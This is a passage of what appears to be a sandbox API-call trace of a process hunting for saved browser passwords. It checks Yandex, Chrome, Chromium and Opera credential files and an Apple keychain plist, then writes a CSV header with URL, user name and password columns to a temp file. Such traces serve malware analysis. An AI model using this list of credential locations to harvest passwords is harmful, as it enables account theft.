pszPath=0x19caf8, csidl=28, fCreate=0 | out: pszPath="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local") returned 1 [0255.015] wcslen (_String="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local") returned 0x36 [0255.015] wcslen (_String="Yandex\\YandexBrowser\\User Data\\Default\\Login Data") returned 0x31 [0255.015] wcscpy (in: _Dest=0x19cf18, _Source="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local" | out: _Dest="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local") returned="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local" [0255.015] wcslen (_String="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local") returned 0x36 [0255.015] wcscat (in: _Dest=0x19cf18, _Source="\\" | out: _Dest="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\") returned="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\" [0255.015] wcscat (in: _Dest=0x19cf18, _Source="Yandex\\YandexBrowser\\User Data\\Default\\Login Data" | out: _Dest="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Yandex\\YandexBrowser\\User Data\\Default\\Login Data") returned="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Yandex\\YandexBrowser\\User Data\\Default\\Login Data" [0255.015] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Yandex\\YandexBrowser\\User Data\\Default\\Login Data" (normalized: "c:\\windows\\system32\\config\\systemprofile\\appdata\\local\\yandex\\yandexbrowser\\user data\\default\\login data")) returned 0xffffffff [0255.016] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x19cf18, csidl=28, fCreate=0 | out: pszPath="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local") returned 1 [0255.016] wcslen (_String="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local") returned 0x36 [0255.016] wcslen (_String="Google\\Chrome\\User Data") returned 0x17 [0255.016] wcscpy (in: _Dest=0x19cd08, _Source="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local" | out: _Dest="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local") returned="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local" [0255.016] wcslen (_String="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local") returned 0x36 [0255.016] wcscat (in: _Dest=0x19cd08, _Source="\\" | out: _Dest="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\") returned="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\" [0255.016] wcscat (in: _Dest=0x19cd08, _Source="Google\\Chrome\\User Data" | out: _Dest="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Google\\Chrome\\User Data") returned="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Google\\Chrome\\User Data" [0255.016] wcslen (_String="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Google\\Chrome\\User Data") returned 0x4e [0255.016] wcslen (_String="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Google\\Chrome\\User Data") returned 0x4e [0255.016] wcslen (_String="*.*") returned 0x3 [0255.016] wcscpy (in: _Dest=0x19b2dc, _Source="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Google\\Chrome\\User Data" | out: _Dest="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Google\\Chrome\\User Data") returned="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Google\\Chrome\\User Data" [0255.016] wcslen (_String="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Google\\Chrome\\User Data") returned 0x4e [0255.016] wcscat (in: _Dest=0x19b2dc, _Source="\\" | out: _Dest="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Google\\Chrome\\User Data\\") returned="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Google\\Chrome\\User Data\\" [0255.016] wcscat (in: _Dest=0x19b2dc, _Source="*.*" | out: _Dest="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Google\\Chrome\\User Data\\*.*" [0255.016] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Google\\Chrome\\User Data\\*.*", lpFindFileData=0x19b564 | out: lpFindFileData=0x19b564) returned 0xffffffff [0255.016] wcslen (_String="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local") returned 0x36 [0255.016] wcslen (_String="Google\\Chrome SxS\\User Data") returned 0x1b [0255.016] wcscpy (in: _Dest=0x19cd08, _Source="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local" | out: _Dest="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local") returned="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local" [0255.016] wcslen (_String="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local") returned 0x36 [0255.016] wcscat (in: _Dest=0x19cd08, _Source="\\" | out: _Dest="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\") returned="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\" [0255.016] wcscat (in: _Dest=0x19cd08, _Source="Google\\Chrome SxS\\User Data" | out: _Dest="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Google\\Chrome SxS\\User Data") returned="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Google\\Chrome SxS\\User Data" [0255.016] wcslen (_String="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Google\\Chrome SxS\\User Data") returned 0x52 [0255.016] wcslen (_String="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Google\\Chrome SxS\\User Data") returned 0x52 [0255.016] wcslen (_String="*.*") returned 0x3 [0255.016] wcscpy (in: _Dest=0x19b2dc, _Source="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Google\\Chrome SxS\\User Data" | out: _Dest="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Google\\Chrome SxS\\User Data") returned="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Google\\Chrome SxS\\User Data" [0255.016] wcslen (_String="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Google\\Chrome SxS\\User Data") returned 0x52 [0255.016] wcscat (in: _Dest=0x19b2dc, _Source="\\" | out: _Dest="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Google\\Chrome SxS\\User Data\\") returned="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Google\\Chrome SxS\\User Data\\" [0255.016] wcscat (in: _Dest=0x19b2dc, _Source="*.*" | out: _Dest="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*") returned="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*" [0255.016] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*", lpFindFileData=0x19b564 | out: lpFindFileData=0x19b564) returned 0xffffffff [0255.016] wcslen (_String="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local") returned 0x36 [0255.016] wcslen (_String="Chromium\\User Data") returned 0x12 [0255.016] wcscpy (in: _Dest=0x19cd08, _Source="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local" | out: _Dest="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local") returned="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local" [0255.016] wcslen (_String="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local") returned 0x36 [0255.017] wcscat (in: _Dest=0x19cd08, _Source="\\" | out: _Dest="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\") returned="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\" [0255.017] wcscat (in: _Dest=0x19cd08, _Source="Chromium\\User Data" | out: _Dest="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Chromium\\User Data") returned="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Chromium\\User Data" [0255.017] wcslen (_String="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Chromium\\User Data") returned 0x49 [0255.017] wcslen (_String="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Chromium\\User Data") returned 0x49 [0255.017] wcslen (_String="*.*") returned 0x3 [0255.017] wcscpy (in: _Dest=0x19b2dc, _Source="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Chromium\\User Data" | out: _Dest="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Chromium\\User Data") returned="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Chromium\\User Data" [0255.017] wcslen (_String="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Chromium\\User Data") returned 0x49 [0255.017] wcscat (in: _Dest=0x19b2dc, _Source="\\" | out: _Dest="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Chromium\\User Data\\") returned="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Chromium\\User Data\\" [0255.017] wcscat (in: _Dest=0x19b2dc, _Source="*.*" | out: _Dest="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Chromium\\User Data\\*.*") returned="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Chromium\\User Data\\*.*" [0255.017] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Chromium\\User Data\\*.*", lpFindFileData=0x19b564 | out: lpFindFileData=0x19b564) returned 0xffffffff [0255.017] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x19bac4, csidl=26, fCreate=0 | out: pszPath="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming") returned 1 [0255.017] wcslen (_String="Apple Computer\\Preferences\\keychain.plist") returned 0x29 [0255.017] wcslen (_String="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming") returned 0x38 [0255.017] wcscpy (in: _Dest=0x19caf8, _Source="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming" | out: _Dest="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming") returned="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming" [0255.017] wcslen (_String="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming") returned 0x38 [0255.017] wcscat (in: _Dest=0x19caf8, _Source="\\" | out: _Dest="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\") returned="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\" [0255.017] wcscat (in: _Dest=0x19caf8, _Source="Apple Computer\\Preferences\\keychain.plist" | out: _Dest="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\Apple Computer\\Preferences\\keychain.plist") returned="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\Apple Computer\\Preferences\\keychain.plist" [0255.017] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\Apple Computer\\Preferences\\keychain.plist" (normalized: "c:\\windows\\system32\\config\\systemprofile\\appdata\\roaming\\apple computer\\preferences\\keychain.plist")) returned 0xffffffff [0255.017] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x19cf18, csidl=26, fCreate=0 | out: pszPath="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming") returned 1 [0255.017] wcslen (_String="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming") returned 0x38 [0255.017] wcslen (_String="Opera\\Opera\\wand.dat") returned 0x14 [0255.017] wcscpy (in: _Dest=0x19cd08, _Source="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming" | out: _Dest="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming") returned="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming" [0255.017] wcslen (_String="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming") returned 0x38 [0255.017] wcscat (in: _Dest=0x19cd08, _Source="\\" | out: _Dest="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\") returned="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\" [0255.017] wcscat (in: _Dest=0x19cd08, _Source="Opera\\Opera\\wand.dat" | out: _Dest="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\Opera\\Opera\\wand.dat") returned="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\Opera\\Opera\\wand.dat" [0255.017] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\Opera\\Opera\\wand.dat" (normalized: "c:\\windows\\system32\\config\\systemprofile\\appdata\\roaming\\opera\\opera\\wand.dat")) returned 0xffffffff [0255.017] wcslen (_String="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming") returned 0x38 [0255.017] wcslen (_String="Opera\\Opera7\\profile\\wand.dat") returned 0x1d [0255.017] wcscpy (in: _Dest=0x19cd08, _Source="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming" | out: _Dest="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming") returned="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming" [0255.017] wcslen (_String="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming") returned 0x38 [0255.017] wcscat (in: _Dest=0x19cd08, _Source="\\" | out: _Dest="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\") returned="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\" [0255.017] wcscat (in: _Dest=0x19cd08, _Source="Opera\\Opera7\\profile\\wand.dat" | out: _Dest="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\Opera\\Opera7\\profile\\wand.dat") returned="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\Opera\\Opera7\\profile\\wand.dat" [0255.018] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\Opera\\Opera7\\profile\\wand.dat" (normalized: "c:\\windows\\system32\\config\\systemprofile\\appdata\\roaming\\opera\\opera7\\profile\\wand.dat")) returned 0xffffffff [0255.018] wcslen (_String="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming") returned 0x38 [0255.018] wcslen (_String="Opera") returned 0x5 [0255.018] wcscpy (in: _Dest=0x19c8e8, _Source="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming" | out: _Dest="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming") returned="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming" [0255.018] wcslen (_String="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming") returned 0x38 [0255.018] wcscat (in: _Dest=0x19c8e8, _Source="\\" | out: _Dest="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\") returned="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\" [0255.018] wcscat (in: _Dest=0x19c8e8, _Source="Opera" | out: _Dest="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\Opera") returned="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\Opera" [0255.018] wcslen (_String="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\Opera") returned 0x3e [0255.018] wcslen (_String="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\Opera") returned 0x3e [0255.018] wcslen (_String="*.*") returned 0x3 [0255.018] wcscpy (in: _Dest=0x19bcec, _Source="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\Opera" | out: _Dest="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\Opera") returned="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\Opera" [0255.018] wcslen (_String="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\Opera") returned 0x3e [0255.018] wcscat (in: _Dest=0x19bcec, _Source="\\" | out: _Dest="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\Opera\\") returned="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\Opera\\" [0255.018] wcscat (in: _Dest=0x19bcec, _Source="*.*" | out: _Dest="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\Opera\\*.*") returned="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\Opera\\*.*" [0255.018] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\Opera\\*.*", lpFindFileData=0x19bf74 | out: lpFindFileData=0x19bf74) returned 0xffffffff [0255.018] wcslen (_String="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming") returned 0x38 [0255.018] wcslen (_String="Opera Software\\Opera Stable\\Login Data") returned 0x26 [0255.018] wcscpy (in: _Dest=0x19caf8, _Source="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming" | out: _Dest="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming") returned="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming" [0255.018] wcslen (_String="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming") returned 0x38 [0255.018] wcscat (in: _Dest=0x19caf8, _Source="\\" | out: _Dest="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\") returned="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\" [0255.018] wcscat (in: _Dest=0x19caf8, _Source="Opera Software\\Opera Stable\\Login Data" | out: _Dest="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\Opera Software\\Opera Stable\\Login Data") returned="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\Opera Software\\Opera Stable\\Login Data" [0255.018] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\Opera Software\\Opera Stable\\Login Data" (normalized: "c:\\windows\\system32\\config\\systemprofile\\appdata\\roaming\\opera software\\opera stable\\login data")) returned 0xffffffff [0255.018] FreeLibrary (hLibModule=0x737c0000) returned 1 [0255.050] FreeLibrary (hLibModule=0x760f0000) returned 1 [0255.050] _wcsicmp (_String1="/nosort", _String2="/scomma") returned -5 [0255.050] _wcsicmp (_String1="/nosort", _String2="C:\\Windows\\TEMP\\2ECB.tmp") returned -52 [0255.050] qsort (in: _Base=0x0, _NumOfElements=0x0, _SizeOfElements=0x1028, _PtFuncCompare=0x40dbe1 | out: _Base=0x0) [0255.050] SetCursor (hCursor=0x10007) returned 0x10007 [0255.050] CreateFileW (lpFileName="C:\\Windows\\TEMP\\2ECB.tmp" (normalized: "c:\\windows\\temp\\2ecb.tmp"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0255.054] LoadCursorW (hInstance=0x0, lpCursorName=0x7f02) returned 0x10007 [0255.054] SetCursor (hCursor=0x10007) returned 0x10007 [0255.054] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="URL", cchWideChar=-1, lpMultiByteStr=0x19d740, cbMultiByte=8191, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="URL", lpUsedDefaultChar=0x0) returned 4 [0255.054] strlen (_Str="URL") returned 0x3 [0255.054] WriteFile (in: hFile=0x20c, lpBuffer=0x19d740*, nNumberOfBytesToWrite=0x3, lpNumberOfBytesWritten=0x19f740, lpOverlapped=0x0 | out: lpBuffer=0x19d740*, lpNumberOfBytesWritten=0x19f740*=0x3, lpOverlapped=0x0) returned 1 [0255.055] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=",", cchWideChar=-1, lpMultiByteStr=0x19d740, cbMultiByte=8191, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=",", lpUsedDefaultChar=0x0) returned 2 [0255.055] strlen (_Str=",") returned 0x1 [0255.055] WriteFile (in: hFile=0x20c, lpBuffer=0x19d740*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f740, lpOverlapped=0x0 | out: lpBuffer=0x19d740*, lpNumberOfBytesWritten=0x19f740*=0x1, lpOverlapped=0x0) returned 1 [0255.055] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Web Browser", cchWideChar=-1, lpMultiByteStr=0x19d740, cbMultiByte=8191, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Web Browser", lpUsedDefaultChar=0x0) returned 12 [0255.055] strlen (_Str="Web Browser") returned 0xb [0255.055] WriteFile (in: hFile=0x20c, lpBuffer=0x19d740*, nNumberOfBytesToWrite=0xb, lpNumberOfBytesWritten=0x19f740, lpOverlapped=0x0 | out: lpBuffer=0x19d740*, lpNumberOfBytesWritten=0x19f740*=0xb, lpOverlapped=0x0) returned 1 [0255.055] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=",", cchWideChar=-1, lpMultiByteStr=0x19d740, cbMultiByte=8191, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=",", lpUsedDefaultChar=0x0) returned 2 [0255.055] strlen (_Str=",") returned 0x1 [0255.055] WriteFile (in: hFile=0x20c, lpBuffer=0x19d740*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f740, lpOverlapped=0x0 | out: lpBuffer=0x19d740*, lpNumberOfBytesWritten=0x19f740*=0x1, lpOverlapped=0x0) returned 1 [0255.055] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="User Name", cchWideChar=-1, lpMultiByteStr=0x19d740, cbMultiByte=8191, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="User Name", lpUsedDefaultChar=0x0) returned 10 [0255.055] strlen (_Str="User Name") returned 0x9 [0255.055] WriteFile (in: hFile=0x20c, lpBuffer=0x19d740*, nNumberOfBytesToWrite=0x9, lpNumberOfBytesWritten=0x19f740, lpOverlapped=0x0 | out: lpBuffer=0x19d740*, lpNumberOfBytesWritten=0x19f740*=0x9, lpOverlapped=0x0) returned 1 [0255.055] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=",", cchWideChar=-1, lpMultiByteStr=0x19d740, cbMultiByte=8191, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=",", lpUsedDefaultChar=0x0) returned 2 [0255.055] strlen (_Str=",") returned 0x1 [0255.055] WriteFile (in: hFile=0x20c, lpBuffer=0x19d740*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f740, lpOverlapped=0x0 | out: lpBuffer=0x19d740*, lpNumberOfBytesWritten=0x19f740*=0x1, lpOverlapped=0x0) returned 1 [0255.055] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Password", cchWideChar=-1, lpMultiByteStr=0x19d740, cbMultiByte=8191, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Password", lpUsedDefaultChar=0x0) returned 9 [0255.055] strlen (_Str="Password") returned 0x8 [0255.055] WriteFile (in: hFile=0x20c, lpBuffer=0x19d740*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x19f740, lpOverlapped=0x0 | out: lpBuffer=0x19d740*, lpNumberOfBytesWritten=0x19f740*=0x8, lpOverlapped=0x0) returned 1 [0255.055] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=",", cchWideChar=-1, lpMultiByteStr=0x19d740, cbMultiByte=8191, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=",", lpUsedDefaultChar=0x0) returned 2 [0255.055] strlen (_Str=",") returned 0x1 [0255.055] WriteFile (in: hFile=0x20c, lpBuffer=0x19d740*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f740, lpOverlapped=0x0 | out: lpBuffer=0x19d740*, lpNumberOfBytesWritten=0x19f740*=0x1, lpOverlapped=0x0) returned 1 [0255.056] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Password Strength", cchWideChar=-1, lpMultiByteStr=0x19d740, cbMultiByte=8191, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Password Strength", lpUsedDefaultChar=0x0) returned 18 [0255.056] strlen (_Str="Password Strength") returned 0x11 [0255.056] WriteFile (in: hFile=0x20c, lpBuffer=0x19d740*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x19f740, lpOverlapped=0x0 | out: lpBuffer=0x19d740*, lpNumberOfBytesWritten=0x19f740*=0x11, lpOverlapped=0x0) returned 1 [0255.057] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=",", cchWideChar=-1, lpMultiByteStr=0x19d740, cbMultiByte=8191, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=",", lpUsedDefaultChar=0x0) returned 2 [0255.057] strlen (_Str=",") returned 0x1 [0255.057] WriteFile (in: hFile=0x20c, lpBuffer=0x19d740*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f740, lpOverlapped=0x0 | out: lpBuffer=0x19d740*, lpNumberOfBytesWritten=0x19f740*=0x1, lpOverlapped=0x0) returned 1 [0255.057] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="User Name Field", cchWideChar=-1, lpMultiByteStr=0x19d740, cbMultiByte=8191, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="User Name Field", lpUsedDefaultChar=0x0) returned 16 [0255.057] strlen (_Str="User Name Field") returned 0xf [0255.057] WriteFile (in: hFile=0x20c, lpBuffer=0x19d740*, nNumberOfBytesToWrite=0xf, lpNumberOfBytesWritten=0x19f740, lpOverlapped=0x0 | out: lpBuffer=0x19d740*, lpNumberOfBytesWritten=0x19f740*=0xf, lpOverlapped=0x0) returned 1 [0255.057] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=",", cchWideChar=-1, lpMultiByteStr=0x19d740, cbMultiByte=8191, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=",", lpUsedDefaultChar=0x0) returned 2 [0255.057] strlen (_Str=",") returned 0x1 [0255.057] WriteFile (in: hFile=0x20c, lpBuffer=0x19d740*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f740, lpOverlapped=0x0 | out: lpBuffer=0x19d740*, lpNumberOfBytesWritten=0x19f740*=0x1, lpOverlapped=0x0) returned 1 [0255.057] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Password Field", cchWideChar=-1, lpMultiByteStr=0x19d740, cbMultiByte=8191, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Password Field", lpUsedDefaultChar=0x0) returned 15 [0255.057] strlen (_Str="Password Field") returned 0xe [0255.057] WriteFile (in: hFile=0x20c, lpBuffer=0x19d740*, nNumberOfBytesToWrite=0xe, lpNumberOfBytesWritten=0x19f740, lpOverlapped=0x0 | out: lpBuffer=0x19d740*, lpNumberOfBytesWritten=0x19f740*=0xe, lpOverlapped=0x0) returned 1 [0255.058] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=",", cchWideChar=-1, lpMultiByteStr=0x19d740, cbMultiByte=8191, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=",", lpUsedDefaultChar=0x0) returned 2 [0255.058] strlen (_Str=",") returned 0x1 [0255.058] WriteFile (in: hFile=0x20c, lpBuffer=0x19d740*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f740, lpOverlapped=0x0 | out: lpBuffer=0x19d740*, lpNumberOfBytesWritten=0x19f740*=0x1, lpOverlapped=0x0) returned 1 [0255.058] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Created Time", cchWideChar=-1, lpMultiByteStr=0x19d740, cbMultiByte=8191, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Created Time", lpUsedDefaultChar=0x0) returned 13 [0255.058] strlen (_Str="Created Time") returned 0xc [0255.058] WriteFile (in: hFile=0x20c, lpBuffer=0x19d740*, nNumberOfBytesToWrite=0xc, lpNumberOfBytesWritten=0x19f740, lpOverlapped=0x0 | out: lpBuffer=0x19d740*, lpNumberOfBytesWritten=0x19f740*=0xc, lpOverlapped=0x0) returned 1 [0255.058] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=",", cchWideChar=-1, lpMultiByteStr=0x19d740, cbMultiByte=8191, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=",", lpUsedDefaultChar=0x0) returned 2 [0255.058] strlen (_Str=",") returned 0x1 [0255.058] WriteFile (in: hFile=0x20c, lpBuffer=0x19d740*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f740, lpOverlapped=0x0 | out: lpBuffer=0x19d740*, lpNumberOfBytesWritten=0x19f740*=0x1, lpOverlapped=0x0) returned 1 [0255.058] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Modified Time", cchWideChar=-1, lpMultiByteStr=0x19d740, cbMultiByte=8191, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Modified Time", 